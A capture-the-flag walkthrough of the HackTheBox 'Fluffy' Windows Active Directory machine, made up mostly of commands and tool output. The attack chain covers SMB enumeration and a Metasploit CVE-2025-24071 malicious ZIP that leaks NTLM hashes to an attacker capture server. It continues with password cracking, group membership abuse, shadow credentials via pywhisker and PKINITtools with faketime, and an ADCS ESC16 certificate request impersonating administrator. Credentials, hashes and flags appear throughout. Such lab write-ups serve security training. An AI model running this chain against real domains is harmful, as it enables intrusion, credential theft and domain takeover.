$ cat fluffy-htb-active-directory-attack-walkthrough.md
Fluffy (HTB) - Active Directory Attack Walkthrough
> June 23, 2025
| HackTheBox
Overview
This walkthrough details the step-by-step process of compromising the “Fluffy” Windows Active Directory environment on HackTheBox. The attack path demonstrates real-world red team tactics, including enumeration, exploitation, lateral movement, and privilege escalation, with a focus on ADCS and Kerberos abuse.
1. Initial Access & Enumeration
- Credentials Provided:
j.fleischman / J0elTHEM4n1990! - Target: 10.10.11.69 (Windows AD)
Port & Service Discovery
nmap 10.10.11.69
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
- Key services: Kerberos, LDAP, SMB, WinRM, etc.
User & Share Enumeration
netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --users
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.69 445 DC01 Administrator 2025-04-17 15:45:01 0 Built-in account for administering the computer/domain
SMB 10.10.11.69 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.69 445 DC01 krbtgt 2025-04-17 16:00:02 0 Key Distribution Center Service Account
SMB 10.10.11.69 445 DC01 ca_svc 2025-04-17 16:07:50 0
SMB 10.10.11.69 445 DC01 ldap_svc 2025-04-17 16:17:00 0
SMB 10.10.11.69 445 DC01 p.agila 2025-04-18 14:37:08 0
SMB 10.10.11.69 445 DC01 winrm_svc 2025-05-18 00:51:16 0
SMB 10.10.11.69 445 DC01 j.coffey 2025-04-19 12:09:55 0
SMB 10.10.11.69 445 DC01 j.fleischman 2025-05-16 14:46:55 0
SMB 10.10.11.69 445 DC01 [*] Enumerated 9 local users: FLUFFY
netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 [*] Enumerated shares
SMB 10.10.11.69 445 DC01 Share Permissions Remark
SMB 10.10.11.69 445 DC01 ----- ----------- ------
SMB 10.10.11.69 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.69 445 DC01 C$ Default share
SMB 10.10.11.69 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.69 445 DC01 IT READ,WRITE
SMB 10.10.11.69 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.69 445 DC01 SYSVOL READ Logon server share
# Found writable share named IT
-> exploring IT share
> impacket-smbclient j.fleischman:'J0elTHEM4n1990!'@10.10.11.69
# get Upgrade_Notice.pdf
# get Everything-1.4.1.1026.x64.zip
# get KeePass-2.58.zip
-> Download files and read notice pdf. –>by reviewing pdf we can exploiting CVE-2025-24071 .
2. Exploitation: NTLM Hash Leak (CVE-2025-24071)
1) fireup msfconsole
msfconsole -q
msf6 > search CVE-2025-24071
# exploit used auxiliary/windows/misc/ntlm_hash_leak
set attacker_ip 10.10.16.23
set filename hacked.zip
run
# will generate zip file
# exploitation steps
[*] Malicious ZIP file created: hacked.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
2) start ntlm capture server
# msfconsole
use server/capture/smb
run
3) upload hacked.zip file and execute on victim
> smbclient //10.10.11.69/it -U j.fleischman # pass J0elTHEM4n1990!
put hacked.zip
tar hacked.zip
-> Now coming back to smb server back
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 10.10.11.69
.. .
.. .
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:1e92d1bc8ef6d5e9:29f16b8ec07f6f473bbfdc065b55b08d:010100000000000080e7aae8e0e1db01130df1f701f88905000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080080e7aae8e0e1db01060004000200000008003000300000000000000001000000002000007dc4a945ac29448907e13c995899e7d52d1b6e0a7e0c69468ea099fd7719fa310a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00320033000000000000000000
-> got NTLMv2 hashes but can not use it because impacket-scripts suports NTLMv1 hashes so we need to crack hashes .
# save hash into file and fire up john
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303 (p.agila)
1g 0:00:00:01 DONE (2025-06-20 18:51) 0.6578g/s 2974Kp/s 2974Kc/s 2974KC/s proquis..prison only
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
-> Found username : p.agila password : prometheusx-303
3. BloodHound & Group Escalation
# using bloodhound-python (cli version) tool to find relationships..
bloodhound-python -c all -d fluffy.htb -u p.agila -p prometheusx-303 --zip -ns 10.10.11.69
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 54S
INFO: Compressing output into 20250620195310_bloodhound.zip
-> Analysing files by unzipping 20250620195310_bloodhound zipfile.
# add p.agila into service account using bloodyAD tool
bloodyAD -u p.agila -p prometheusx-303 --host 10.10.11.69 -d dc01.fluffy.htb add groupMember 'SERVICE ACCOUNTS' 'p.agila'
[+] p.agila added to SERVICE ACCOUNTS
4. Shadow Credentials Attack (winrm_svc)
> impacket-GetUserSPNs -request -dc-ip 10.10.11.69 'fluffy.htb'/'p.agila':'prometheusx-303'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- --------- --------------------------------------------- -------------------------- -------------------------- ----------
ADCS/ca.fluffy.htb ca_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-04-17 21:37:50.136701 2025-06-21 04:23:54.544982
LDAP/ldap.fluffy.htb ldap_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-04-17 21:47:00.599545 <never>
WINRM/winrm.fluffy.htb winrm_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-05-18 06:21:16.786913 2025-05-19 20:43:22.188468
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
installing pywhisker
# installing pywhisker
pipx install pywhisker # unofficial library
---
# listing services ...
pywhisker -a list -t winrm_svc -d fluffy.htb -u p.agila -p prometheusx-303 --dc-ip $target ─╯
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Listing devices for winrm_svc
[*] DeviceID: 1ea372ed-2084-6b06-81f3-6e3b1a4c3a4d | Creation Time (UTC): 2025-06-22 07:03:10.904001
[*] DeviceID: c4643ac6-6cb5-9454-fdd9-a43e5076fdbf | Creation Time (UTC): 2025-06-22 13:48:48.916580
# adding winrm_svc to get access..
pywhisker -a add -t winrm_svc -d fluffy.htb -u p.agila -p prometheusx-303 --dc-ip $target ─╯
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 2ea213e5-d3eb-02ac-7982-51dd4a445e20
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: 0Y0itlEm.pfx
[*] Must be used with password: gMcZasXtUESCK9fUdHRZ
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
-> to access winrm_svc ; need to install and use fellow modules…
- https://github.com/dirkjanm/PKINITtools
# init virtual enuironment
- python -m venv tempenv
- source tempenv/bin/activate
# clone repo
git clone https://github.com/dirkjanm/PKINITtools
pip3 install impacket minikerberos
-> now, we have KeyCredential but still we need TGT keys so we will use gettgtpkinit.py script . -> when using first trial we ancountered time syncing error called “The clock skew is too great”
python gettgtpkinit.py -cert-pfx 0Y0itlEm.pfx -pfx-pass gMcZasXtUESCK9fUdHRZ fluffy.htb/winrm_svc winrm_svc.ccache
..
res = sock.sendrecv(req)
File "/home/kaulik/Documents/WalkThroughs/Hackthebox/Fluffy/tempenv/lib/python3.13/site-packages/minikerberos/network/clientsocket.py", line 85, in sendrecv
raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError: Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great"
-> To prevent this error we have to fake time so we are using faketime tools .
# first check what time running on target AD
> net time -S 10.10.11.69
Sun Jun 22 23:00:58 2025
# now using faketime to prevent error and grab keys.
# you can install with apt (kali)
> faketime 'Sun Jun 22 23:00:58 2025' python gettgtpkinit.py -cert-pfx 0Y0itlEm.pfx -pfx-pass gMcZasXtUESCK9fUdHRZ fluffy.htb/winrm_svc winrm_svc.ccache
2025-06-22 23:00:58,621 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-06-22 23:00:58,648 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-06-22 23:01:18,730 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-06-22 23:01:18,730 minikerberos INFO aa053df3d974a3c7cf06cc59ef8d0dccabd92e5dfcd035af3bb8772065442293
INFO:minikerberos:aa053df3d974a3c7cf06cc59ef8d0dccabd92e5dfcd035af3bb8772065442293
2025-06-22 23:01:18,741 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
# here; we grab tgt key in file... winrm_svc.ccache
Now time for ntlm hash
-> to get ntlm hash ; this step too require faketime so be ready … -> also getnthash.py script requires to set variable in env
# add this line in your shell config file. eg. .bashrc or .zshrc
# or just in you terminal session.
export KRB5CCNAME="/home/user/fluffy/winrm_svc.ccache" # replace your respected dir
> net time -S 10.10.11.69
Sun Jun 22 23:39:22 2025
> faketime 'Sun Jun 22 23:39:22 2025' python3 getnthash.py fluffy.htb/winrm_svc -key aa053df3d974a3c7cf06cc59ef8d0dccabd92e5dfcd035af3bb8772065442293
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
33bd09dcd697600edf6b3a7af4875767
-> got NT hash : 33bd09dcd697600edf6b3a7af4875767
5. Escalation: ca_svc & ADCS ESC16
- Used
certipy-adto perform shadow credentials attack onca_svc:faketime 'Mon Jun 23 00:54:02 2025' certipy-ad shadow auto -account ca_svc -target-ip 10.10.11.69 -u winrm_svc@fluffy.htb -hashes :33bd09dcd697600edf6b3a7af4875767 - Found ESC16 vulnerability in ADCS (security extension disabled).
- Changed UPN of
ca_svctoadministratorand requested a certificate:certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' update -upn 'administrator' faketime 'Mon Jun 23 22:01:00 2025' certipy-ad req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User' - Authenticated as administrator, extracted NTLM hash, and obtained
root.txtvia Evil-WinRM.
Flags
- user.txt:
0c8013ee54bc3241f99049e0be118969 - root.txt:
58ffa17b5e4af0c8fa2d2a836a84997e
Notes & Tools Used
- Tools: nmap, netexec, impacket, bloodhound-python, bloodyAD, pywhisker, PKINITtools, certipy-ad, Evil-WinRM
- Key techniques: NTLM relay, shadow credentials, ADCS misconfig, Kerberos abuse
- Useful references:
- https://www.hackingarticles.in/active-directory-penetration-testing-using-impacket/
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse
- https://www.hackingarticles.in/a-detailed-guide-on-certipy/
This walkthrough demonstrates a full compromise of a modern AD environment using chained misconfigurations and credential abuse. Always test in authorized environments.